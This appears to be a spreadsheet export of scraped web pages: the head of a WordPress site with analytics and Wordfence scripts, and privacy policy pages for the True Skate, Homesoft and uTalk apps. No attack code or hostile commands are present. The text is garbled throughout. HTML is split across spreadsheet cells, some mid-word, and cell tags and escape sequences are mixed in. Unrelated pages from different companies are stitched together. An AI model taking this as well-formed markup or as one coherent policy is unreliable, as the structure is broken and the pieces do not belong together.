&lt;script type='text/javascript' src='https://rawfury.com/wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js?ver=3.11.1' id='smush-lazy-load-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://rawfury.com/wp-json/" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" type="application/json" href="https://rawfury.com/wp-json/wp/v2/pages/3" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://rawfury.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://rawfury.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel='shortlink' href='https://rawfury.com/?p=3' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://rawfury.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frawfury.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://rawfury.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frawfury.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
		&lt;!-- GA Google Analytics @ https://m0n.co/ga</t>
  </si>
  <si>
    <t>--&gt;
		&lt;script&gt;
			(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
			})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
			ga('create', 'UA-75342177-5', 'auto');
			ga('send', 'pageview');
		&lt;/script&gt;
			&lt;script&gt;
			document.documentElement.className = document.documentElement.className.replace( 'no-js', 'js' );
		&lt;/script&gt;
				&lt;style&gt;
			.no-js img.lazyload { display: none; }
			figure.wp-block-image img.lazyloading { min-width: 150px; }
							.lazyload, .lazyloading { opacity: 0; }
				.lazyloaded {
					opacity: 1;
					transition: opacity 250ms;
					transition-delay: 0ms;
				}
					&lt;/style&gt;
		&lt;style type="text/css" id="css-fb-visibility"&gt;@media screen and (max-width: 640px){.fusion-no-small-visibility{display:none ! important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-center{text-align:center ! important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-left{text-align:left !</t>
  </si>
  <si>
    <t>important;}body:not(.fusion-builder-ui-wireframe) .sm-text-align-right{text-align:right ! important;}body:not(.fusion-builder-ui-wireframe) .sm -flex-align-center{justify-content:center !</t>
  </si>
  <si>
    <t>important;}body:not(.fusion-builder-ui-wireframe) .sm -flex-align-flex-start{justify-content:flex-start ! important;}body:not(.fusion-builder-ui-wireframe) .sm</t>
  </si>
  <si>
    <t>-flex-align-flex-end{justify-content:flex-end ! important;}body:not(.fusion-builder-ui-wireframe) .sm-mx-auto{margin-left:auto !important;margin-right:auto ! important;}body:not(.fusion-builder-ui-wireframe) .sm-ml-auto{margin-left:auto !</t>
  </si>
  <si>
    <t>important;}body:not(.fusion-builder-ui-wireframe) .sm-mr-auto{margin-right:auto ! important;}body:not(.fusion-builder-ui-wireframe) .fusion-absolute-position-small{position:absolute;top:auto;width:100%;}}@media screen and (min-width: 641px) and (max-width: 1024px){.fusion-no-medium-visibility{display:none ! important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-center{text-align:center !</t>
  </si>
  <si>
    <t>important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-left{text-align:left ! important;}body:not(.fusion-builder-ui-wireframe) .md-text-align-right{text-align:right ! important;}body:not(.fusion-builder-ui-wireframe) .md</t>
  </si>
  <si>
    <t>-flex-alig</t>
  </si>
  <si>
    <t>keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		if (window.wfLogHumanRan) { return; }
		window.wfLogHumanRan = true;
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&amp;r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i &lt; evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i &lt; evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//playdatedigital.com/?wordfence_lh=1&amp;hid=8981DB615033E950BDB880AE20E71B58');
&lt;/script&gt;		&lt;style type="text/css"&gt;.recentcomments a{display:inline !important;padding:0 !important;margin:0 ! important;}&lt;/style&gt;
		&lt;meta name="generator" content="Powered by Slider Revolution 5.4.5.1 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;
		&lt;script type="text/javascript"&gt;function setREVStartSize(e){_x005F_x000D_
				try{ var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0;					_x005F_x000D_
					if(e.responsiveLevels&amp;&amp;(jQuery.each(e.responsiveLevels,function(e,f){f&gt;i&amp;&amp;(t=r=f,l=e),i&gt;f&amp;&amp;f&gt;r&amp;&amp;(r=f,n=e)}),t&gt;r&amp;&amp;(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h&gt;1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length&gt;0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length&gt;1&amp;&amp;void 0!=e.fullScreenOffset&amp;&amp;e.fullScreenOffset.length&gt;0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&amp;&amp;e.fullScreenOffset.length&gt;0&amp;&amp;(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&amp;&amp;f&lt;e.minHeight&amp;&amp;(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f})					_</t>
  </si>
  <si>
    <t>&lt;html lang="en"&gt;
&lt;head&gt;                                    
	&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
	&lt;link rel="stylesheet" type="text/css" href="trueaxis.css" /&gt;
	&lt;style type="text/css"&gt;
		.ta_main a.trueskate
		{
			text-decoration:none;
			pointer-events: none;
			cursor: default;
			font-weight:bold;
		}
		.ta_main a.subtrueskateprivacypolicy
		{
			text-decoration:none;
			pointer-events: none;
			cursor: default;
			font-weight:bold;
		}
&lt;/style&gt;
	&lt;title&gt;True Skate&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
	&lt;div class="ta_main"&gt;
		&lt;div class="ta_networks"&gt;
			&lt;div style="float: right;"&gt;
				&lt;table cellpadding="0" cellspacing="0" border="0"&gt;
					&lt;tr&gt;
						&lt;td class="ta_faviconbg"&gt;&lt;a href="http://www.facebook.com/pages/Melbourne-Australia/True-Axis/166891738465"&gt;&lt;img src="nwfb.png" alt="" width="16" height="16" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;
						&lt;td class="ta_favicontxt"&gt;&lt;a href="http://www.facebook.com/pages/Melbourne-Australia/True-Axis/166891738465"&gt;Find us on Facebook&lt;/a&gt;&lt;/td&gt;
						&lt;td width="38"&gt;&lt;/td&gt;
						&lt;td class="ta_faviconbg"&gt;&lt;a href="http://www.youtube.com/trueaxis"&gt;&lt;img src="nwyt.png" alt="" width="16" height="16" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;
						&lt;td class="ta_favicontxt"&gt;&lt;a href="http://www.youtube.com/trueaxis"&gt;YouTube Channel&lt;/a&gt;&lt;/td&gt;
						&lt;td width="38"&gt;&lt;/td&gt;
						&lt;td class="ta_faviconbg"&gt;&lt;a href="http://twitter.com/trueaxis"&gt;&lt;img src="nwtw.png" alt="" width="16"	height="16" border="0" /&gt;&lt;/a&gt;&lt;/td&gt;
						&lt;td class="ta_favicontxt"&gt;&lt;a href="http://twitter.com/trueaxis"&gt;Follow us on Twitter&lt;/a&gt;&lt;/td&gt;
					&lt;/tr&gt;
				&lt;/table&gt;
			&lt;/div&gt;
		&lt;/div&gt; 
		&lt;div class="ta_title"&gt;
			&lt;img src="title.jpg" alt=""/&gt;
		&lt;/div&gt;
		&lt;div class="ta_gametitlebig"&gt;
			&lt;img src="tstitlebig.jpg" alt=""/&gt;
		&lt;/div&gt;
			&lt;div class="ta_mainmenu"&gt;
				&lt;table cellpadding="0" cellspacing="0" border="0" width="1024"&gt;
					&lt;tr&gt;
						&lt;td&gt;
							&lt;table cellpadding="0" cellspacing="0" border="0" width="auto"&gt;
								&lt;tr&gt;
									&lt;td class="ta_mainmenuitem"&gt;&lt;a class="home" href="./"&gt;Home&lt;/a&gt;&lt;/td&gt;
                  &lt;td class="ta_mainmenubrk"&gt;|&lt;/td&gt;
									&lt;td class="ta_mainmenuitem"&gt;&lt;a class="truesurf" href="truesurf.html"&gt;True Surf&lt;/a&gt;&lt;/td&gt;
									&lt;td class="ta_mainmenubrk"&gt;|&lt;/td&gt;
									&lt;td class="ta_mainmenuitem"&gt;&lt;a class="trueskate" href="trueskate.html"&gt;True Skate&lt;/a&gt;&lt;/td&gt;
									&lt;td class="ta_mainmenubrk"&gt;|&lt;/td&gt;
									&lt;td class="ta_mainmenuitem"&gt;&lt;a class="jetcarstunts2" href="jetcarstunts2.html"&gt;Jet Car Stunts 2&lt;/a&gt;&lt;/td&gt;
									&lt;td class="ta_mainmenubrk"&gt;|&lt;/td&gt;
									&lt;td class="ta_mainmenuitem"&gt;&lt;a class="jetcarstunts" href="jetcarstunts.html"&gt;Jet Car Stunts&lt;/a&gt;&lt;/td&gt;
									&lt;td class="ta_mainmenubrk"&gt;|&lt;/td&gt;
									&lt;td class="ta_mainmenuitem"&gt;&lt;a class="spacetripper" href="spacetripper.html"&gt;Space Tripper&lt;/a&gt;&lt;/td&gt;
									&lt;td class="ta_mainmenubrk"&gt;|&lt;/td&gt;
									&lt;td class="ta_mainmenuitem"&gt;&lt;a href="physics/index.html"&gt;True Axis Physics SDK&lt;/a&gt;&lt;/td&gt;
								&lt;/tr&gt;
							&lt;/table&gt;
						&lt;/td&gt;
						&lt;td align="right" class="ta_mainmenuitemright"&gt;
							&lt;div id="idContact" style="cursor:pointer"&gt;&lt;/div&gt;
						&lt;/td&gt;
					&lt;/tr&gt;
				&lt;/table&gt;
			&lt;/div&gt; 
			&lt;div class="ta_submenu"&gt;
				&lt;table cellpadding="0" cellspacing="0" border="0" width="auto"&gt;
					&lt;tr&gt;
						&lt;td class="ta_submenuitem"&gt;&lt;a class="subtrueskate" href="trueskate.html"&gt;True Skate&lt;/a&gt;&lt;/td&gt;
						&lt;td class="ta_submenubrk"&gt;|&lt;/td&gt;
						&lt;td class="ta_submenuitem"&gt;&lt;a class="subsupporttrueskateios" href="supporttrueskateios.html"&gt;Support: iOS&lt;/a&gt;&lt;/td&gt;
						&lt;td class="ta_submenubrk"&gt;|&lt;/td&gt;
						&lt;td class="ta_submenuitem"&gt;&lt;a class="subsupporttrueskateandroid" href="supporttrueskateandroid.html"&gt;Support: Android&lt;/a&gt;&lt;/td&gt;
						&lt;td class="ta_submenubrk"&gt;|&lt;/td&gt;
						&lt;td class="ta_submenuitem"&gt;&lt;a class="subtrueskateprivacypolicy" href="tsspp.html"&gt;Privacy Policy&lt;/a&gt;&lt;/td&gt;
						&lt;td class="ta_submenubrk"&gt;|&lt;/td&gt;
						&lt;td class="ta_submenuitem"&gt;&lt;a class="subtruesurfuseragreement" href="tsua.html"&gt;Terms of Services&lt;/a&gt;&lt;/td&gt;
					&lt;/tr&gt;
				&lt;/table&gt;
			&lt;/div&gt; 
		&lt;div class="ta_body"&gt;
			&lt;div class="ta_faqtrueskate"&gt;
				&lt;h2&gt;True Skate Privacy Policy&lt;/h2&gt;
				&lt;p&gt;                           
       In the process of providing connectivity services, we may collect various information during your usage of the game True Skate as describe below.&lt;/p&gt;
    &lt;p&gt;You may op out of data collection on the login screen by either (a) unchecking all the check boxes then pressing "Play", or by (b) pressing the "skip login" button.</t>
  </si>
  <si>
    <t>By opting out, you will not have access to all of the connectivity features of the game True Skate.&lt;/p&gt;
	&lt;h3&gt;DELETE USER DATA&lt;/h3&gt;
	&lt;p&gt;If you would like to delete your personal data, email support@trueskate.com. Note you will be subject to our ability to reasonably verify your identity.
	   Please be prepared to provide us with identifying information such as Player ID so we can match against our records in order to confirm you are the rightful account holder.&lt;/p&gt;
    &lt;h3&gt;THIRD PARTY SERVICES&lt;/h3&gt;
        &lt;p&gt;True Skate may make use of Third Party Services, which are services that are not under our control, such as Facebook and Kamcord.</t>
  </si>
  <si>
    <t>For additional details, we encourage you to seek and check Third Party Services privacy policies yourself. You too acknowledge that we are not liable when Third Party Services use information you provide to them.&lt;/p&gt;
    &lt;h3&gt; NO TARGETED ADVERTISING&lt;/h3&gt;
        &lt;p&gt;</t>
  </si>
  <si>
    <t>We will not use your data for the purpose of targeting personalised advertising at you.&lt;/p&gt;
    &lt;h3&gt;PERSONAL IDENTIFIABLE DATA&lt;/h3&gt;
        &lt;p&gt;If you check the Facebook Connect box, we may collect your Facebook ID, and your Facebook name. Your Display Name will be changed to your Facebook name, but you have the option to change this. Other users of True Skate will be able to see your Display Name.&lt;/p&gt;
    &lt;p&gt;</t>
  </si>
  <si>
    <t>In the future, we may allow other users of True Skate to see your Facebook ID in leaderboards where you have posted a score, but we will give the option to opt out.&lt;/p&gt;
    &lt;h3&gt;DEVICE INFORMATION&lt;/h3&gt;
        &lt;p&gt;Where allowed, we may collect data to identify your device for the purpose of security. We may also collect information about your devices hardware for the purpose of improving the quality of our games. Your personal Device Information will not be shared with other users.&lt;/p&gt;
    &lt;h3&gt;LOCATION DATA&lt;/h3&gt;
        &lt;p&gt;If permission is given, we may collect your precise geographical location for the purpose of displaying leaderboards of other users local to you.</t>
  </si>
  <si>
    <t>Any scores you post on our leaderboards may allow other users to know that you are local to them. Other users will not be able to know your precise location.&lt;/p&gt;
    &lt;h3&gt;USEAGE DATA&lt;/h3&gt;
        &lt;p&gt;We may collect data on how frequently you play the game. This will not be made available to other other users of True Skate.&lt;/p&gt;
    &lt;h3&gt;SCORES AND RECORDED PLAY DATA&lt;/h3&gt;
        &lt;p&gt;</t>
  </si>
  <si>
    <t>We may collect your scores, and recorded play data for the purpose of global leaderboards with replays. This data will be shared with other users and attached to your Display Name.&lt;/p&gt;
    &lt;h3&gt;OTHER PRIVATE DATA&lt;/h3&gt;
        &lt;p&gt; We will not collect any other private data such as phone numbers or addresses.&lt;/p&gt;
    &lt;h3&gt;SHARING YOUR DATA WITH OTHER PARTIES&lt;/h3&gt;
        &lt;p&gt;We may use your usage data, and approximate location, and Device Information to help generate aggregated Usage Statics for the game True Skate across all users.</t>
  </si>
  <si>
    <t>No Personal Identifiable data, Display Names or individual data will be retained in these Usage Statistics. We may share these Usage Statistics with other parties for any reason.&lt;/p&gt;
    &lt;h3&gt;DATA SECURITY&lt;/h3&gt;
        &lt;p&gt; We take reasonable steps to secure your data against unauthorised access or disclosure.</t>
  </si>
  <si>
    <t>We encrypt transmission of data. However, no security or encryption method can be guaranteed to protect information from hackers or human error.&lt;/p&gt;
        &lt;p&gt;Information we collect may be stored or processed on computers located in any country where we do business.&lt;/p&gt;
    &lt;h3&gt;EXCEPTIONS&lt;/h3&gt;
        &lt;p&gt; It may be the case that we will be required to provide some or all of your collected information to a 3rd party by law.</t>
  </si>
  <si>
    <t>In this case we comply with the law. We may also provide any of your information to any 3rd party if you give us expressed permission to do so.&lt;/p&gt;
			&lt;/div&gt;	
		&lt;/div&gt;	
		&lt;div style="height: 48;"&gt;&lt;/div&gt;	
    &lt;div style ="display:none; font-size:1%"&gt;
      &lt;a href="mailto: accounts@trueaxi.com"&gt;accounts@trueaxi.com&lt;/a&gt;
      &lt;a href="mailto:sales2@trueaxis.com"&gt;sales2@trueaxis.com&lt;/a&gt;
      &lt;a href="mailto:sales3@trueaxis.com"&gt;sales3@trueaxis.com&lt;/a&gt;
      &lt;a href="mailto:sales4@trueaxi.com"&gt;sales4@trueaxi.com&lt;/a&gt;
      &lt;a href="mailto:contracto@trueaxis.com"&gt;contracto@trueaxis.com&lt;/a&gt;
      &lt;a href="mailto:freddd@rueaxis.com"&gt;red@trueaxis.co&lt;/a&gt;
      &lt;a href="mailto:sed@rueaxis.com"&gt;sed@trueaxis.co&lt;/a&gt;
      &lt;a href="mailto:sales@trueskate.org"&gt;sales@trueskate.org&lt;/a&gt;
      &lt;a href="mailto:connect@trueskate.org"&gt;connect@trueskate.org&lt;/a&gt;
      &lt;a href="mailto:sales@trueskate.com.tv"&gt;sales@trueskate.com.tv&lt;/a&gt;
      &lt;a href="mailto:sales@trueskate.co.uk"&gt;connect@trueskate.co.uk&lt;/a&gt;
      &lt;a href="mailto:sales@trueskate.net"&gt;sales@trueskate.net&lt;/a&gt;
      &lt;a href="mailto:connect@trueskate.net"&gt;connect@trueskate.net&lt;/a&gt;
    &lt;/div&gt;
		&lt;div class="ta_footer" &gt;
    &lt;div style ="display: inline-block; min-width:59%; min-height:40" &gt;
					&lt;table cellpadding="0" cellspacing="0" border="0" width="auto"&gt;
						&lt;tr&gt;
&lt;script type="text/javascript"&gt;
// &lt;!--
             // document.write('&lt;td class="ta_footermenuitem"&gt;&lt;a href="mai' + 'lto' + ':contact');
             //</t>
  </si>
  <si>
    <t>document.write('@' + 'trueaxis' + '.com"&gt;Contact&lt;/a&gt;&lt;/td&gt;');
             // document.write('&lt;td class="ta_footermenubrk"&gt;|&lt;/td&gt;');
//--&gt;
&lt;/script&gt;
							&lt;td class="ta_footermenuitem"&gt;&lt;a class="home" href="./"&gt;Home&lt;/a&gt;&lt;/td&gt;		
							&lt;td class="ta_footermenubrk"&gt;|&lt;/td&gt;
							&lt;td class="ta_footermenuitem"&gt;&lt;a class="jetcarstunts" href="jetcarstunts.html"&gt;Jet Car Stunts&lt;/a&gt;&lt;/td&gt;
							&lt;td class="ta_footermenubrk"&gt;|&lt;/td&gt;
							&lt;td class="ta_footermenuitem"&gt;&lt;a class="jetcarstunts2" href="jetcarstunts2.html"&gt;Jet Car Stunts 2&lt;/a&gt;&lt;/td&gt;
							&lt;td class="ta_footermenubrk"&gt;|&lt;/td&gt;
							&lt;td class="ta_footermenuitem"&gt;&lt;a class="spacetripper" href="spacetripper.html"&gt;Space Tripper&lt;/a&gt;&lt;/td&gt;
							&lt;td class="ta_footermenubrk"&gt;|&lt;/td&gt;
							&lt;td class="ta_footermenuitem"&gt;&lt;a class="trueskate" href="trueskate.html"&gt;True Skate&lt;/a&gt;&lt;/td&gt;
							&lt;td class="ta_footermenubrk"&gt;|&lt;/td&gt;				
							 &lt;td class="ta_footermenuitem"&gt;&lt;a class="truesurf" href="truesurf.html"&gt;True Skate&lt;/a&gt;&lt;/td&gt;
							&lt;td class="ta_footermenubrk"&gt;|&lt;/td&gt;									
							&lt;td class="ta_footermenuitem"&gt;&lt;a href="physics/index.html"&gt;True Axis Physics SDK&lt;/a&gt;&lt;/td&gt;
						&lt;/tr&gt;
					&lt;/table&gt;
		&lt;/div&gt;
    &lt;div style ="display: inline-block; min-width:39%; text-align:right; min-height:40;"&gt;
					&lt;table cellpadding="0" cellspacing="0" border="0" width ="100%"&gt;
						&lt;tr&gt;  
				      &lt;td align="right"  class="ta_footermenuitem" style="color: #444444; text-align:right;"&gt;
					      &amp;copy Copyright 2009-2018 True Axis Pty. Ltd.</t>
  </si>
  <si>
    <t xml:space="preserve">Australia. All rights reserved.
                 &lt;/td&gt;
              &lt;/tr&gt;
           &lt;/table&gt;
			&lt;/div&gt;
		&lt;div style="height: 24;"&gt;&lt;/div&gt;
		&lt;/div&gt;
&lt;script type="text/javascript"&gt;
// &lt;!--
  function OnContactClose()
  {
      var e = document.getElementById("idContact");
      </t>
  </si>
  <si>
    <t>e.innerHTML = "Contact";
      e.style.cursor = "pointer";
      e.setAttribute( "onclick", "javascript: OnContactClicked();" );
    //  document.onclick = null;
  }
  function OnContactClicked()
  {
    var e = document.getElementById("idContact");
    if (e)
    {
      e.innerHTML = 
        'Contact &lt;div class="ta_contactinfo"&gt;&lt;div style="cursor:pointer"&gt;X&lt;/div&gt;&lt;div style="text-align: left;"&gt;' +    
        'For quick answers to support questions, please check the following links before contacting us.</t>
  </si>
  <si>
    <t>Most answers can be found there.&lt;br/&gt;&lt;br/&gt;'+
        '&lt;a href="trueskaterequests.html"&gt;True Skate suggestions&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;' +
        '&lt;a href="supporttrueskateios.html"&gt;Suport: True Skate - iOS&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;' +
        '&lt;a href="supporttrueskateandroid.html"&gt;Suport: True Skate - Android&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;'</t>
  </si>
  <si>
    <t>+
        '&lt;a href="supporttruesurfios.html"&gt;Suport: True Surf - iOS&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;' +
        '&lt;a href="supporttruesurfandroid.html"&gt;Suport: True Surf - Android&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;' +
        '&lt;a href="supportjetcarstunts2.html"&gt;Suport: Jet Car Stunts 2 &lt;/a&gt;&lt;br/&gt;&lt;br/&gt;' +
        '&lt;a href="jetcarstuntssupport.html"&gt;Suport: Jet Car Stunts&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;'</t>
  </si>
  <si>
    <t xml:space="preserve">+
        '&lt;a href="supportspacetripperios.html"&gt;Suport: Spacetripper&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;' +
        '&lt;a href="jetcarstunts2.html"&gt;Jet Car Sunts 2 Android&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;' +
        'For matters not related to support questions email &lt;a href="mai'+'lto:'+'contact'+'@'+'trueaxis.com'+'" &gt;'+'contact'+'@'+'trueaxis.com'+'&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;';      
        '&lt;/div&gt; &lt;/div&gt;';
      e.style.cursor = "auto";
      e.setAttribute( "onclick", "javascript: OnContactClose();" );
    }
  }
  function SetupContact()
  {
    var e = document.getElementById("idContact");
    if (e)
    {
      e.innerHTML = "Contact";
      e.style.cursor = "pointer";
      e.setAttribute( "onclick", "javascript: OnContactClicked();" );
    }
  }
  SetupContact();
//--&gt;
&lt;/script&gt; 
	&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"_x005F_x000D_
"http://www.w3.org/TR/html4/loose.dtd"&gt;_x005F_x000D_
&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en"&gt;_x005F_x000D_
	&lt;head&gt;_x005F_x000D_
		&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;_x005F_x000D_
		&lt;link href="stylesheets/default.css" rel="stylesheet" type="text/css" /&gt;_x005F_x000D_
		&lt;style&gt;_x005F_x000D_
			td {_x005F_x000D_
				padding-top: 10px;_x005F_x000D_
				padding-bottom: 10px;_x005F_x000D_
			}_x005F_x000D_
_x005F_x000D_
		&lt;/style&gt;_x005F_x000D_
		&lt;title&gt;Homesoft&lt;/title&gt;_x005F_x000D_
	&lt;/head&gt;_x005F_x000D_
	&lt;body&gt;_x005F_x000D_
		&lt;div class="header" &gt;_x005F_x000D_
			&lt;img src="images/home.png" style="border: 6px solid transparent" /&gt;_x005F_x000D_
			&lt;div class = "homesoft"&gt;_x005F_x000D_
				Homesoft_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
		&lt;div class="indent"&gt;_x005F_x000D_
			&lt;h1&gt;Privacy Policy&lt;/h1&gt;_x005F_x000D_
			Homesoft is committed to protecting the privacy of its users.   Before using the app, please carefully read the following statement._x005F_x000D_
			&lt;p&gt;_x005F_x000D_
			Homesoft may collect anonymous usage statics about how individuals are using the app (such as the number of users and device models who are using the latest version) to help us improve the app.  </t>
  </si>
  <si>
    <t xml:space="preserve">We will not include any of your personal information._x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
	&lt;/body&gt;_x005F_x000D_
	&lt;!--#include file="footer.html" --&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;html&gt;
&lt;head&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;title&gt;uTalk Terms, Conditions and Privacy Policy&lt;/title&gt;
&lt;/head&gt;
&lt;body style="font-size: larger;"&gt;
&lt;h1&gt;uTalk Terms, Conditions and Privacy Policy&lt;/h1&gt;
&lt;p&gt;Boring Legal Stuff&lt;/p&gt;
&lt;p&gt;(or, “End User License Agreement” if you’d like the technical term)&lt;/p&gt;
 &lt;p&gt;At uTalk, we hate boring legal stuff like this document. We want you to have fun and start learning, but we’ve been reliably informed that we need this document in place to protect both us and you.&lt;/p&gt;
&lt;p&gt;We’d be really grateful if you could read through it, because by using uTalk, you agree to the terms in this document.</t>
  </si>
  <si>
    <t>We hate reading these as much as you do though, so we’ve tried to summarise below.&lt;/p&gt;
&lt;p&gt; The short version:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Don’t steal our stuff. uTalk and all of our content is Copyright 2016 EuroTalk ltd.&lt;/li&gt;
&lt;li&gt;Using coins to unlock packs in uTalk means you can use them for however long you have an account, but doesn’t mean you own the content (that is, you can’t sell our stuff to anyone else).</t>
  </si>
  <si>
    <t>In legal terms, EuroTalk grant you a non-transferrable license to use that content for the lifetime of your account. By “lifetime of your account”, we mean up to and including the day that you delete your account with us (which we hope you never do!) &lt;/li&gt;
&lt;li&gt;Buying a subscription to uTalk means you can use the content you subscribe to for as long as you stay a subscriber.</t>
  </si>
  <si>
    <t>If you stop subscribing, you won’t have access to that content anymore. In legal terms, EuroTalk grant you a non-transferrable license to use that content for the lifetime of your subscription. By “lifetime of your subscription”, we mean up to and including the day that your subscription runs out.&lt;/li&gt;
&lt;li&gt;Despite the rules we set out here, we’re reasonable and friendly people.</t>
  </si>
  <si>
    <t>Talk to us if you have any concerns, want a refund, or want to give stuff you’ve bought to someone else. We’ll probably be able to make it happen. Get in touch via utalk.com and we’ll get back to you.&lt;/li&gt;
&lt;li&gt;uTalk is designed to give you a fun start to learning a language, and hopefully more!</t>
  </si>
  <si>
    <t>We’re careful to check all our content for accuracy, but we can’t absolutely guarantee it. In case of any mistakes, problems caused by using the app, or socially awkward situations; our liability will be limited at our discretion to a refund or compensation in the form of digital coins for use in uTalk. &lt;/li&gt;
&lt;li&gt;uCoins have no monetary value, and cannot be exchanged for cash after purchase - only for in-app content.&lt;/li&gt;
&lt;li&gt;We’re very grateful to some fantastic software developers who have released open-source code, some of which we use in uTalk.</t>
  </si>
  <si>
    <t>This code is licensed under various terms, and we detail these separately. For more information, get in touch via utalk.com&lt;/li&gt;
&lt;/ol&gt;
Information about uTalk subscriptions.&lt;br&gt;
A subscription to uTalk is £7.99 a month, or the equivalent in local currency.&lt;br&gt;
Subscriptions give you access to all of uTalk's content, in every language.&lt;br&gt;
Subscriptions last one month, and auto-renew every month unless cancelled.&lt;br&gt;
Subscription automatically renews unless auto-renew is turned off at least 24-hours before the end of the current period.&lt;br&gt;
Subscriptions can be managed by you and auto-renewal may be turned off by going to your Account Settings after purchase.&lt;br&gt;
&lt;h1&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt; This webpage and application uses Google Analytics, a web analytics service provided by Google, Inc.</t>
  </si>
  <si>
    <t>("Google"). Google Analytics uses "cookies", which are text files placed on your computer to help Eurotalk analyze how visitors use the site. The information generated by the cookie about your use of the website (including your IP address) will be transmitted to and stored by Google on servers in the United States.</t>
  </si>
  <si>
    <t>Google will use this information for the purpose of evaluating your use of this website, compiling reports on your website activity for pages visited, the duration and bounce rate, while providing other miscellaneous services relating to website activity and usage. Google may also transfer this information to third parties where required to do so by law, or where such third parties process the information on Google's behalf. Google will not associate your IP address with any other data held by Google.</t>
  </si>
  <si>
    <t>You may refuse the use of cookies by selecting the appropriate settings on your browser, however please note that if you do this you may not be able to use the full functionality of this website. By using this website, you consent to the processing of data about you by Google in the manner and for the purposes set out above. You can prevent Google’s cookie generated collection of data, referring to your use of the website (including your IP address), plus the processing of the data, by downloading and installing the browser-plugin&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We may collect, store and use the following kinds of personal information: &lt;br&gt;
(a)	information about your computer and about your visits to and use of this website (including your IP address, geographical location, browser type and version, operating system, referral source, length of visit, page views and website navigation paths);
&lt;br&gt;(b)	information that you provide to us when registering with our website (including your email address)
&lt;br&gt;(c)	information that you provide when completing your profile on our website (including your name, address and postcode);
&lt;br&gt;(d)	information that you provide to us for the purpose of subscribing to uTalk and/or newsletters (including your name and email address)
 &lt;br&gt;Personal information supplied to us will be used only for the purposes of managing your subscription.&lt;br&gt;
We will take reasonable technical and organisational precautions to prevent the loss, misuse or alteration of your personal information.&lt;br&gt;
We will store all the personal information you provide on our secure (password- and firewall-protected) servers.&lt;br&gt;
We are registered as a data controller with the UK Information Commissioner's Office.&lt;br&gt;
 EuroTalk is a limited company registered in England.</t>
  </si>
  <si>
    <t xml:space="preserve">Registered number: 2674118. 315-317 New Kings Road, London, SW6 4RF
&lt;/body&gt;	</t>
  </si>
  <si>
